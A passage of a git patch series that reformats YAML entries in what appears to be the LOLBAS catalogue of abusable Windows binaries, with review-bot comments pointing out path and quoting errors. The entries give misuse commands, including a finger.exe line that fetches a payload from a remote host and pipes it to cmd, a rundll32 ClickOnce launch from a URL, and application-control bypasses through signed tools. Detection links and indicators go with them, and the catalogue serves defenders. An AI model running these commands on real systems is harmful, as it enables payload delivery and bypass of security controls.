diff --git a/yml/OSBinaries/.AppInstaller.yml.swp b/yml/OSBinaries/.AppInstaller.yml.swp new file mode 100644 index 0000000000000000000000000000000000000000..93cd402447f998b7fc3ec2217ffa41a78a3485f2 GIT binary patch literal 12288 zcmeI2&yU+g6vt=bNGqx$aYK55s$6hvC+U*4_?0G98!6d@WJ8OHWR2}{GK%eSXU6O1 zLeKmG@IP?jPvF9(`~mz0h!b}%po(WFtEP*pMdAdSk-i#b-piYr&wF!-@&f1c;TXEj z7Qu0gknhjl3V;0i_R+JauaZz?LRRb73`u#!{(<9HbwIlma>KKgJ(`T}_2&D@a_w!J z*pvA^o>9q}vU_D_nUhBt06UhZ!! zhJYbp2p9r}fFWQA7y^cXA@IK=pz|a01aI}q{$_9P=c6n0{-c=;0YktLFa!(%L%=?&u$X(GwKJ_ zcc^bs7pM*D_Zx)#hWZjUMcqLCfw6zt@A0(S#|%Tj5HJJ`0YktLFa!(%L%SI6S`dUaKp9@0${B0AaFdBLVbO}EEYn`?IO5sHgSFPV z@@!j|Tx)E<4Ml1{4{2jpt}c}Aw%hF!$8p>5x7w|{sN)WqF(nEaGPMgg=c|-HkGJA_ zT?BQw+H(4tttt;YNJL-8 zmpqF^sq83I{-c7)ZMEV@k9>?pl~41WztBHCV48)RBZeIks@ER$z2#Jjm82=$=NNVQ zU>6m;kJWO_Ln)Mqb#uVfMvMHgC)szKuG_?WyG_S`eBAN+$| zu;se)>r>5ELT)`6h%!qA{-Udv(H>HT#c;U_F@6?wDR9bY%I;Jw2UOGLNQ5+5PIqCh%g>c`^q0dkru#Hp zv*ib~-q~O>wz^jTv^TQ`!`Y|(^U3UskC2E3eUYYkDi5&ErG`{l^q`jTS$w>!@eePb zNlr0?0nh5fmbA2Ww4JZZQAzfp@HO-$!$e`wM$2hAmfNzNR)h2ky%rJ|4<2TNypWP} vAre3oQB8Ue6AMRVAmS=v5AE@M_z>`n2@h+70yG|!(-}ha{+3%}Sr+*V_JpM> literal 0 HcmV?d00001 diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index ee23cf7..df6283e 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml 
@@ -1,27 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 4627f7c..936098f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml 
@@ -1,30 +1,30 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' +--- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: 'Downloads payload from remote Finger server. 
This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml + - IOC: finger.exe should not be run on a normal workstation. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index c16451c..ffec91d 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml 
@@ -1,28 +1,28 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index a227eaf..91b6b26 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml 
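Review bot: This entry is named Dfshim.dll and its Command loads `dfshim.dll` via rundll32, but every `Full_Path` value points at Dfsvc.exe under the .NET Framework directories, so the path list describes a different binary from the one the entry is about; the Dfsvc.exe paths belong on the Dfsvc entry and this one should list where dfshim.dll is located. The `MitreID: T1127` also differs from the `T1218.011` used by the other rundll32 library entries touched in this series (Ieadvpack, Shell32, Setupapi), which matters because the MitreID is what detection content keys on. `Code_Sample: - Code:` is a bare empty value that parses as null; if the schema permits it, `Code_Sample: []` states the same thing without relying on null being tolerated.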
@@ -1,24 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml +Resources: + - Link: 
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index f427c5a..fe18464 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml 
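Review bot: The Command value on the new side still begins with a typographic right double quote, `'”powershell.exe -command "set-location ...`, so the documented command line is not what a user would type and a detection rule copied from it would not match; since this commit is a formatting pass over these files, that stray character is in scope. The same `”` closes `[Program.Class]::Main()”'` in the UtilityFunctions.ps1 hunk further down (PATCH 49), and yamllint cannot catch either because both sit inside a quoted scalar. Dropping the character in both files, so the CL_LoadAssembly value starts `'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; ...`, is the whole fix.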
@@ -1,38 +1,38 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' +--- +Name: Fsi.exe 
+Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' 
diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index ce3205e..7e8d513 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml 
@@ -1,35 +1,35 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Full_Path: - - Path: no default -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Person: Alfie Champion - Handle: '@ajpc500' +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: '2020-10-14' +Commands: + - Command: 
procdump.exe -md calc.dll explorer.exe + Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Person: Alfie Champion + Handle: '@ajpc500' diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index 4afb3a5..b2d3380 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
@@ -1,30 +1,30 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 2d084c7..b9de32f 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml 
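Review bot: The Description's path `C:\Users\[current user]\AppData\Roaminguiverify.config` appears to have lost the separator between `Roaming` and `uiverify.config`; as written it names a file directly under `AppData`, which matters because this is the artifact a defender would watch for. Presumably `C:\Users\[current user]\AppData\Roaming\uiverify.config` was intended — confirm against the linked write-up before changing it. The dangling ` - ` before the path reads like a leftover and could go in the same edit.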
@@ -1,27 +1,27 @@ ---- -Name: Wfc.exe -Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: wfc.exe c:\path\to\test.xoml - Description: Execute arbitrary C# code embedded in a XOML file. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe -Code_Sample: - - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Jimmy - Handle: '@bohops' +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' From 2c3653f0c4789e462d53afb0040a9e25049f8049 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 01:36:14 -0400 Subject: [PATCH 49/60] Fixing more file formatting issues. --- yml/OSScripts/UtilityFunctions.yml | 48 ++++++++++----------- yml/OtherMSBinaries/FsiAnyCpu.yml | 68 +++++++++++++++--------------- 2 files changed, 58 insertions(+), 58 deletions(-) diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index ee53be2..800938c 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml 
@@ -1,24 +1,24 @@ ---- -Name: UtilityFunctions.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml -Resources: - - Link: https://twitter.com/nickvangilder/status/1441003666274668546 -Acknowledgement: - - Person: Nick VanGilder - Handle: '@nickvangilder' +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: 